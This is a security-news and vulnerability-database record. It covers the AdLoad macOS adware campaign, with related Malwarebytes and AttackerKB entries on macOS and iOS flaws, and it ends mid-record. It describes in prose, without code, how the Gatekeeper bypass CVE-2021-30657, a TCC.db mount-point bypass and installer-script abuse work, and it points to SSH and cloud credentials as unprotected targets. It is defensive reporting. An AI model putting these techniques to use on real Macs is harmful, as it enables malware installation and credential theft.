New AdLoad Variant Bypasses Apple's Security Defenses to Target macOS Systems

2021-08-16T07:29:00

Description

[![](https://thehackernews.com/images/-DCb4GmwQ6mc/YRoTENWqoEI/AAAAAAAADik/5VlIDxThXOISHwtZvPu89-ta0KRbs41KwCLcBGAsYHQ/s0/code.png)](<https://thehackernews.com/images/-DCb4GmwQ6mc/YRoTENWqoEI/AAAAAAAADik/5VlIDxThXOISHwtZvPu89-ta0KRbs41KwCLcBGAsYHQ/s0/code.png>) A new wave of attacks involving a notorious macOS adware family has evolved to leverage around 150 unique samples in the wild in 2021 alone, some of which have slipped past Apple's on-device malware scanner and even signed by its own notarization service, highlighting the malicious software ongoing attempts to adapt and evade detection. "AdLoad," as the malware is known, is one of several widespread adware and bundleware loaders targeting macOS since at least 2017. It's capable of backdooring an affected system to download and install adware or potentially unwanted programs (PUPs), as well as amass and transmit information about victim machines. The new iteration "continues to impact Mac users who rely solely on Apple's built-in security control XProtect for malware detection," SentinelOne threat researcher Phil Stokes [said](<https://labs.sentinelone.com/massive-new-adload-campaign-goes-entirely-undetected-by-apples-xprotect/>) in an analysis published last week. "As of today, however, XProtect arguably has around 11 different signatures for AdLoad [but] the variant used in this new campaign is undetected by any of those rules." The 2021 version of AdLoad latches on to persistence and executable names that use a different file extension pattern (.system or .service), enabling the malware to get around additional security protections incorporated by Apple, ultimately resulting in the installation of a persistence agent, which, in turn, triggers an attack chain to deploy malicious droppers that masquerade as a fake Player.app to install malware. [![](https://thehackernews.com/images/-rexIao2_jak/YRoRcn2_sKI/AAAAAAAADiY/5c5C4HMLALUECAP4SMJZSck0XGc3fb15ACLcBGAsYHQ/s0/macos-malware.jpg)](<https://thehackernews.com/images/-rexIao2_jak/YRoRcn2_sKI/AAAAAAAADiY/5c5C4HMLALUECAP4SMJZSck0XGc3fb15ACLcBGAsYHQ/s0/macos-malware.jpg>) What's more, the droppers are [signed](<https://blog.confiant.com/osx-hydromac-a-new-macos-malware-leaked-from-a-flashcards-app-2af28f1caa9e>) with a valid signature using developer certificates, prompting Apple to revoke the certificates "within a matter of days (sometimes hours) of samples being observed on VirusTotal, offering some belated and temporary protection against further infections by those particular signed samples by means of Gatekeeper and OCSP signature checks," Stokes noted. SentinelOne said it detected new samples signed with fresh certificates in a couple of hours and days, calling it a "game of whack-a-mole." First samples of AdLoad are said to have appeared as early as November 2020, with regular further occurrences across the first half of 2021, followed by a sharp uptick throughout July and, in particular, the early weeks of August 2021. AdLoad is among the malware families, alongside Shlayer, that's been known to bypass XProtect and infect Macs with other malicious payloads. In April 2021, Apple addressed an actively exploited zero-day flaw in its Gatekeeper service ([CVE-2021-30657](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>)) that was abused by the Shlayer operators to deploy unapproved software on the compromised systems. "Malware on macOS is a problem that the device manufacturer is struggling to cope with," Stokes said. "The fact that hundreds of unique samples of a well-known adware variant have been circulating for at least 10 months and yet still remain undetected by Apple's built-in malware scanner demonstrates the necessity of adding further endpoint security controls to Mac devices." Found this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter __](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.

{"id": "THN:EC6D350524B71F2DAA2D6B7CADC88677", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "New AdLoad Variant Bypasses Apple's Security Defenses to Target macOS Systems", "description": "[![](https://thehackernews.com/images/-DCb4GmwQ6mc/YRoTENWqoEI/AAAAAAAADik/5VlIDxThXOISHwtZvPu89-ta0KRbs41KwCLcBGAsYHQ/s0/code.png)](<https://thehackernews.com/images/-DCb4GmwQ6mc/YRoTENWqoEI/AAAAAAAADik/5VlIDxThXOISHwtZvPu89-ta0KRbs41KwCLcBGAsYHQ/s0/code.png>)\n\nA new wave of attacks involving a notorious macOS adware family has evolved to leverage around 150 unique samples in the wild in 2021 alone, some of which have slipped past Apple's on-device malware scanner and even signed by its own notarization service, highlighting the malicious software ongoing attempts to adapt and evade detection.\n\n\"AdLoad,\" as the malware is known, is one of several widespread adware and bundleware loaders targeting macOS since at least 2017. It's capable of backdooring an affected system to download and install adware or potentially unwanted programs (PUPs), as well as amass and transmit information about victim machines.\n\nThe new iteration \"continues to impact Mac users who rely solely on Apple's built-in security control XProtect for malware detection,\" SentinelOne threat researcher Phil Stokes [said](<https://labs.sentinelone.com/massive-new-adload-campaign-goes-entirely-undetected-by-apples-xprotect/>) in an analysis published last week. \"As of today, however, XProtect arguably has around 11 different signatures for AdLoad [but] the variant used in this new campaign is undetected by any of those rules.\"\n\nThe 2021 version of AdLoad latches on to persistence and executable names that use a different file extension pattern (.system or .service), enabling the malware to get around additional security protections incorporated by Apple, ultimately resulting in the installation of a persistence agent, which, in turn, triggers an attack chain to deploy malicious droppers that masquerade as a fake Player.app to install malware.\n\n[![](https://thehackernews.com/images/-rexIao2_jak/YRoRcn2_sKI/AAAAAAAADiY/5c5C4HMLALUECAP4SMJZSck0XGc3fb15ACLcBGAsYHQ/s0/macos-malware.jpg)](<https://thehackernews.com/images/-rexIao2_jak/YRoRcn2_sKI/AAAAAAAADiY/5c5C4HMLALUECAP4SMJZSck0XGc3fb15ACLcBGAsYHQ/s0/macos-malware.jpg>)\n\nWhat's more, the droppers are [signed](<https://blog.confiant.com/osx-hydromac-a-new-macos-malware-leaked-from-a-flashcards-app-2af28f1caa9e>) with a valid signature using developer certificates, prompting Apple to revoke the certificates \"within a matter of days (sometimes hours) of samples being observed on VirusTotal, offering some belated and temporary protection against further infections by those particular signed samples by means of Gatekeeper and OCSP signature checks,\" Stokes noted.\n\nSentinelOne said it detected new samples signed with fresh certificates in a couple of hours and days, calling it a \"game of whack-a-mole.\" First samples of AdLoad are said to have appeared as early as November 2020, with regular further occurrences across the first half of 2021, followed by a sharp uptick throughout July and, in particular, the early weeks of August 2021.\n\nAdLoad is among the malware families, alongside Shlayer, that's been known to bypass XProtect and infect Macs with other malicious payloads. In April 2021, Apple addressed an actively exploited zero-day flaw in its Gatekeeper service ([CVE-2021-30657](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>)) that was abused by the Shlayer operators to deploy unapproved software on the compromised systems.\n\n\"Malware on macOS is a problem that the device manufacturer is struggling to cope with,\" Stokes said. \"The fact that hundreds of unique samples of a well-known adware variant have been circulating for at least 10 months and yet still remain undetected by Apple's built-in malware scanner demonstrates the necessity of adding further endpoint security controls to Mac devices.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-08-16T07:29:00", "modified": "2021-08-16T11:40:43", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, "href": "https://thehackernews.com/2021/08/new-adload-variant-bypasses-apples.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2021-30657"], "immutableFields": [], "lastseen": "2022-05-09T12:39:14", "viewCount": 103, "enchantments": {"dependencies": {"references": [{"type": "apple", "idList": ["APPLE:2A32C0762786DF36357D645066CDC600", "APPLE:F7DADB3E958148A6B63512580383CEA2"]}, {"type": "attackerkb", "idList": ["AKB:29A92D92-7F52-42AF-809D-8666D33E0DF2"]}, {"type": "cve", "idList": ["CVE-2021-30657"]}, {"type": "githubexploit", "idList": ["285A3734-8E7C-544D-B792-62E544C8ECE8"]}, {"type": "kitploit", "idList": ["KITPLOIT:8409423888936671546"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:11D4071979D3FC1E6028AA8D71EB87F4", "MALWAREBYTES:F17E033D182A0D3753BC7398874F60EE"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-OSX-BROWSER-OSX_GATEKEEPER_BYPASS-"]}, {"type": "nessus", "idList": ["MACOS_HT212325.NASL", "MACOS_HT212326.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162504"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:830105C5509FB1C4D38B114EDD71298E"]}, {"type": "thn", "idList": ["THN:080F85D43290560CDED8F282EE277B00", "THN:0D13405795D42B516C33D8E56A44BA9D", "THN:30412CF0C94BB814E9BC328633580D99", "THN:9F22FC342DFAFC55521FD4F7CEC7C9A3", "THN:BB8CDCFD08801BDD2929E342853D03E9"]}, {"type": "threatpost", "idList": ["THREATPOST:7C630642BA0CC259B4DF61820DA05235"]}, {"type": "zdt", "idList": ["1337DAY-ID-36216"]}]}, "score": {"value": -0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "apple", "idList": ["APPLE:2A32C0762786DF36357D645066CDC600", "APPLE:F7DADB3E958148A6B63512580383CEA2"]}, {"type": "attackerkb", "idList": ["AKB:29A92D92-7F52-42AF-809D-8666D33E0DF2"]}, {"type": "cve", "idList": ["CVE-2021-30657"]}, {"type": "githubexploit", "idList": ["285A3734-8E7C-544D-B792-62E544C8ECE8"]}, {"type": "kitploit", "idList": ["KITPLOIT:8409423888936671546"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:11D4071979D3FC1E6028AA8D71EB87F4", "MALWAREBYTES:F17E033D182A0D3753BC7398874F60EE"]}, {"type": "nessus", "idList": ["MACOS_HT212325.NASL", "MACOS_HT212326.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162504"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:830105C5509FB1C4D38B114EDD71298E"]}, {"type": "thn", "idList": ["THN:9F22FC342DFAFC55521FD4F7CEC7C9A3", "THN:BB8CDCFD08801BDD2929E342853D03E9"]}, {"type": "threatpost", "idList": ["THREATPOST:7C630642BA0CC259B4DF61820DA05235"]}, {"type": "zdt", "idList": ["1337DAY-ID-36216"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-30657", "epss": "0.849700000", "percentile": "0.979160000", "modified": "2023-03-17"}], "vulnersScore": -0.1}, "_state": {"dependencies": 1660004461, "score": 1684008354, "epss": 1679109163}, "_internal": {"score_hash": "087b0ae570d2cd7a23e16829bbe98989"}}

{"malwarebytes": [{"lastseen": "2021-10-12T14:54:18", "description": "The start of fall 2021 saw the fourth [Objective by the Sea (OBTS)](<https://objectivebythesea.com>) security conference, which is the only security conference to focus exclusively on Apple's ecosystem. As such, it draws many of the top minds in the field. This year, those minds, having been starved of a good security conference for so long, were primed and ready to share all kinds of good information.\n\nConferences like this are important for understanding how attackers and their methods are evolving. Like all operating systems, macOS presents a moving target to attackers as it acquires new features and new forms of protection over time.\n\nOBTS was a great opportunity to see how attacks against macOS are evolving. Here's what I learned.\n\n### Transparency, Consent, and Control bypasses\n\nTransparency, Consent, and Control (TCC) is a system for requiring user consent to access certain data, via prompts confirming that the user is okay with an app accessing that data. For example, if an app wants to access something like your contacts or files in your Documents folder on a modern version of macOS, you will be asked to allow it before the app can see that data.\n\n![A TCC prompt asking the user to allow access to the Downloads folder](https://blog.malwarebytes.com/wp-content/uploads/2021/10/TCC-prompt-514x600.png)A TCC prompt asking the user to allow access to the Downloads folder\n\nIn recent years, Apple has been ratcheting down the power of the root user. Once upon a time, root was like God\u2014it was the one and only user that could do everything on the system. It could create or destroy, and could see all. This hasn't been the case for years, with things like System Integrity Protection (SIP) and the read-only signed system volume preventing even the root user from changing files across a wide swath of the hard drive.\n\nTCC has been making inroads in further reducing the power of root over users' data. If an app has root access, it still cannot even _see_\u2014much less modify\u2014a lot of the data in your user folder without your explicit consent.\n\nThis can cause some problems. For example, antivirus software such as Malwarebytes needs to be able to see everything it can in order to best protect you. But even though some Malwarebytes processes are running with root permissions, they still can't see some files. Thus, apps like this often have to require the user to give a special permission called Full Disk Access (FDA). Without FDA, Malwarebytes and other security apps can't fully protect you, but only you can give that access.\n\nThis is generally a good thing, as it puts you in control of access to your data. Malware often wants access to your sensitive data, either to steal it or to encrypt it and demand a ransom. TCC means that malware can't automatically gain access to your data if it gets onto your system, and may be a part of the reason why we just don't see ransomware on macOS.\n\nTCC is a bit of a pain for us, and a common point of difficulty for users of our software, but it does mean that we can't get access to some of your most sensitive files without your knowledge. This is assuming, of course, that you understood the FDA prompts and what you were agreeing to, which is debatable. Apple's current process for assigning FDA doesn't make that clear, and leaves it up to the app asking for FDA to explain the consequences. This makes tricking a user into giving access to something they shouldn't pretty easy.\n\nHowever, social engineering isn't the only danger. Many researchers presenting at this year's conference talked about bugs that allowed them to get around the Transparency, Consent, and Control (TCC) system in macOS, _without getting user consent_.\n\nAndy Grant ([@andywgrant](<https://twitter.com/andywgrant>)) presented a vulnerability in which a remote attacker with root permissions can grant a malicious process whatever TCC permissions is desired. This process involving creating a new user on the system, then using that user to grant the permissions.\n\nCsaba Fitzl ([@theevilbit](<https://twitter.com/theevilbit>)) gave a talk on a "Mount(ain) of Bugs," in which he discussed another vulnerability involving mount points for disk image files. Normally, when you connect an external drive or double-click a disk image file, the volume is "mounted" (in other words, made available for access) within the `/Volumes` directory. In other words, if you connect a drive named "backup", it would become accessible on the system at `/Volumes/backup`. This is the disk's "mount point."\n\n![Mountain of bugs](https://blog.malwarebytes.com/wp-content/uploads/2021/10/Mountain-of-bugs-600x316.png)Title slide of Csaba Fitzl's "Mount(ain) of Bugs" talk\n\nCsaba was able to create a disk image file containing a custom TCC.db file. This file is a database that controls the TCC permissions that the user has granted to apps. Normally, the TCC.db file is readable, but cannot be modified by anything other than the system. However, by mounting this disk image while also setting the mount point to the path of the folder containing the TCC.db file, he was able to trick the system into accepting his arbitrary TCC.db file as if it were the real one, allowing him to change TCC permissions however he desired.\n\nThere were other TCC bypasses mentioned as well, but perhaps the most disturbing is the fact that there's a fairly significant amount of highly sensitive data that is not protected by TCC at all. Any malware can collect that data without difficulty.\n\nWhat is this data, you ask? One example is the `.ssh` folder in the user's home folder. SSH is a program used for securely gaining command line access to a remote Mac, Linux, or other Unix system, and the `.ssh` folder is the location where certificates used to authenticate the connection are stored. This makes the data in that folder a high-value target for an attacker looking to move laterally within an organization.\n\nThere are other similar folders in the same location that can contain credentials for other services, such as AWS or Azure, which are similarly wide open. Also unprotected are the folders where data is stored for any browser other than Safari, which can include credentials if you use a browser's built-in password manager.\n\nNow, admittedly, there could be some technical challenges to protecting some or all of this data under the umbrella of TCC. However, the average IT admin is probably more concerned about SSH keys or other credentials being harvested than in an attacker being able to peek inside your Downloads folder.\n\n### Attackers are doing interesting things with installers\n\nInstallers are, of course, important for malware to get installed on a system. Often, users must be tricked into opening something in order to infect their machine. There are a variety of techniques attackers can use that were discussed.\n\nOne common method for doing this is to use Apple installer packages (.pkg files), but this is not particularly stealthy. Knowledgeable and cautious folks may choose to examine the installer package, as well as the `preinstall` and `postinstall` scripts (designed to run exactly when you'd expect by the names), to make sure nothing untoward is going on.\n\nHowever, citing an example used in the recent Silver Sparrow malware, Tony Lambert ([@ForensicITGuy](<https://twitter.com/ForensicITGuy>)) discussed a sneaky method for getting malware installed: The oft overlooked `Distribution` file.\n\nThe `Distribution` file is found inside Apple installer packages, and is meant to convey information and options for the installer. However, JavaScript code can also be inserted in this file, to be run at the beginning of the installation, meant to be used to determine if the system meets the requirements for the software being installed.\n\nIn the case of Silver Sparrow, however, the installer used this script to download and install the malware covertly. If you clicked Continue in the dialog shown below, you'd be infected even if you then opted not to continue with the installation.\n\n![An Apple installer asking the user to allow a program to run to determine if the software can be installed.](https://blog.malwarebytes.com/wp-content/uploads/2021/02/SilverSparrow_installer-600x424.png)Click Continue to install malware\n\nAnother interesting trick Tony discussed was the use of payload-free installers. These are installers that actually don't contain any files to be installed, and are really just a wrapper for a script that does all the installation (likely via the `preinstall` script, but also potentially via `Distribution`).\n\nNormal installer scripts will leave behind a "receipt," which is a file containing a record of when the installation happened and what was installed where. However, installers that lack an official payload, and that download everything via scripts, do not leave behind such a receipt. This means that an IT admin or security researcher would be missing key information that could reveal when and where malware had been installed.\n\nChris Ross ([@xorrior](<https://twitter.com/xorrior>)) discussed some of these same techniques, but also delved into installer plugins. These plugins are used within installer packages to create custom "panes" in the installer. (Most installers go through a specific series of steps prescribed by Apple, but some developers add additional steps via custom code.)\n\nThese installer plugins are written in Objective-C, rather than scripting languages, and therefore can be more powerful. Best of all, these plugins are very infrequently used, and thus are likely to be overlooked by many security researchers. Yet Chris was able to demonstrate techniques that could be used by such a plugin to drop a malicious payload on the system.\n\nYet another issue was presented in Cedric Owens' ([@cedowens](<https://twitter.com/cedowens>)) talk. Although not related to an installer package (.pkg file), a vulnerability in macOS ([CVE-2021-30657](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30657>)) could allow a Mac app to entirely bypass Gatekeeper, which is the core of many of Apple's security features.\n\nOn macOS, any time you open an app downloaded from the Internet, you should at a minimum see a warning telling you that you're opening an app (in case it was something masquerading as a Word document, or something similar). If there's anything wrong with the app, Gatekeeper can go one step further and prevent you from opening it at all.\n\nBy constructing an app that was missing some of the specific components usually considered essential, an attacker could create an app that was fully functional, but that would not trigger any warnings when launched. (Some variants of the Shlayer adware have been seen using this technique.)\n\nThe post [Inside Apple: How macOS attacks are evolving](<https://blog.malwarebytes.com/malwarebytes-news/2021/10/inside-apple-how-macos-attacks-are-evolving/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-10-12T12:52:23", "type": "malwarebytes", "title": "Inside Apple: How macOS attacks are evolving", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-30657"], "modified": "2021-10-12T12:52:23", "id": "MALWAREBYTES:F17E033D182A0D3753BC7398874F60EE", "href": "https://blog.malwarebytes.com/malwarebytes-news/2021/10/inside-apple-how-macos-attacks-are-evolving/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-10-21T08:35:39", "description": "Apple has released a security update for iOS and iPad that addresses a critical vulnerability reportedly being exploited in the wild.\n\nThe update has been made available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).\n\n### The vulnerability\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This one is listed as [CVE-2021-30883](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30883>) and allows an application to execute arbitrary code with kernel privileges. Kernel privileges can be achieved by using a memory corruption issue in the "IOMobileFrameBuffer" component.\n\nKernel privileges are a serious matter as they offer an attacker more than administrator privileges. In kernel mode, the executing code has complete and unrestricted access to the underlying hardware. It can execute any CPU instruction and reference any memory address. Kernel mode is generally reserved for the lowest-level, most trusted functions of the operating system.\n\nResearchers have already found that this vulnerability is exploitable from the browser, which makes it extra worrying.\n\n> We can confirm that the recently patched iOS 15.0.2 vulnerability, CVE-2021-30883, is also accessible from the browser: perfect for 1-click & water-holing mobile attacks. This vulnerability is exploited in the wild. Update as soon as possible. <https://t.co/dhogxTM6pT>\n> \n> -- ZecOps (@ZecOps) [October 12, 2021](<https://twitter.com/ZecOps/status/1447804721771606016?ref_src=twsrc%5Etfw>)\n\nWatering holes are used as a highly targeted attack strategy. The attacker infects a website where they knows the intended victim(s) visits regularly. Depending on the nature of the infection, the attacker can single out their intended target(s) or just infect anyone that visits the site unprotected.\n\n### IOMobileFrameBuffer\n\nIOMobileFramebuffer is a kernel extension for managing the screen framebuffer. An earlier vulnerability in this extension, listed as [CVE-2021-30807](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30807>) was tied to the [Pegasus spyware](<https://blog.malwarebytes.com/privacy-2/2021/07/pegasus-spyware-has-been-here-for-years-we-must-stop-ignoring-it/>). This vulnerability also allowed an application to execute arbitrary code with kernel privileges. Coincidence? Or did someone take the entire IOMobileFramebuffer extension apart and save up the vulnerabilities for a rainy day?\n\nAnother iPhone exploit called [FORCEDENTRY](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/latest-iphone-exploit-forcedenrty-used-to-launch-pegasus-attack-against-bahraini-activists/>) was found to be used against Bahraini activists to launch the Pegasus spyware. Researchers at Citizen Lab disclosed this vulnerability and code to Apple, and it was listed as CVE-2021-30860.\n\n### Undisclosed\n\nAs is usual for Apple, both the researcher that found the vulnerability and the circumstances under which the vulnerability used in the wild are kept secret. Apple didn't respond to a query about whether the previously found bug was being exploited by NSO Group's Pegasus surveillance software.\n\n### Zero-days for days\n\nOver the last months Apple has had to close quite a few zero-days in iOS, iPadOS,and macOS. Seventeen if I have counted correctly.\n\n * [CVE-2021-1782](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1782>) - iOS-kernel: A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-1870](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1870>) \u2013 WebKit: A remote attacker may be able to cause arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-1871](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1871>) \u2013 WebKit: A remote attacker may be able to cause arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-1879](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1879>) \u2013 WebKit: Processing maliciously crafted web content may lead to universal cross site scripting. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30657](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30657>) \u2013 Gatekeeper: A malicious application may bypass Gatekeeper checks. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30661](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30661>) \u2013 WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30663](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30663>) \u2013 WebKit: Processing maliciously crafted web content may lead to arbitrary code execution.\n * [CVE-2021-30665](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30665>) \u2013 WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30666](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30666>) \u2013 WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30713](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30713>) \u2013 TCC: A malicious application may be able to bypass Privacy preferences. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30761](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30761>) \u2013 WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30762](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30762>) \u2013 WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-308](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30807>)[0](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30807>)[7](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30807>) \u2013 IOMobileFrameBuffer: An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited. Tied to Pegasus (see above).\n * [CVE-2021-30858](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30858>) \u2013 WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30860](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30860>) \u2013 CoreGraphics: Processing a maliciously crafted PDF may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. This is FORCEDENTRY (see above).\n * [CVE-2021-30869](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30869>) \u2013 XNU: A malicious application may be able to execute arbitrary code with kernel privileges. [Reportedly](<https://www.helpnetsecurity.com/2021/09/24/cve-2021-30869/>) being actively exploited by attackers in conjunction with a previously known WebKit vulnerability.\n\nAnd last but not least, the latest addition\u2014CVE-2021-30883\u2014which means that of the 17 zero-days that were fixed over the course of a handful of months, at least 16 were found to be actively exploited.\n\n### Update\n\nApple advises users to update to [iOS 15.0.2 and iPadOS 15.0.2](<https://support.apple.com/en-gb/HT212846>) which can be done through the automatic update function or iTunes.\n\nStay safe, everyone!\n\nThe post [Update now! Apple patches another privilege escalation bug in iOS and iPadOS](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/update-now-apple-patches-another-privilege-escalation-bug-in-ios-and-ipados/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T16:07:53", "type": "malwarebytes", "title": "Update now! Apple patches another privilege escalation bug in iOS and iPadOS", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-30883"], "modified": "2021-10-12T16:07:53", "id": "MALWAREBYTES:11D4071979D3FC1E6028AA8D71EB87F4", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/update-now-apple-patches-another-privilege-escalation-bug-in-ios-and-ipados/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-05-27T14:41:22", "description": "macOS versions prior to 11.3 contain a vulnerability in an unspecified component of System Preferences which, when exploited, results in privilege escalation and the ability to bypass Gatekeeper \u2014 the macOS built-in malware detection and prevention service.\n\n \n**Recent assessments:** \n \n**space-r7** at April 28, 2021 8:19pm UTC reported:\n\nRating this vulnerability as high since it bypasses all of the checks that MacOS performs on downloaded files. It was reportedly introduced in MacOS version `10.15`, and the fix is in version `11.3`. This vulnerability has also been reported as being exploited in the wild.\n\nAn unsigned, unnotarized binary downloaded from the Internet is typically blocked from execution; however a script-based app with no `Info.plist` file bypasses those checks. To read about how that exactly happens, see the objective-see blog post [here](<https://objective-see.com/blog/blog_0x64.html>). This does require user interaction for success, but all it takes is a download and a double click. Additionally, an exploit is quite trivial to make, as all it really needs is a valid app without the `Info.plist` file bundled with it. As always, install your updates.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-09-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-30657 \u2014 Malicious applications may bypass Gatekeeper checks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", 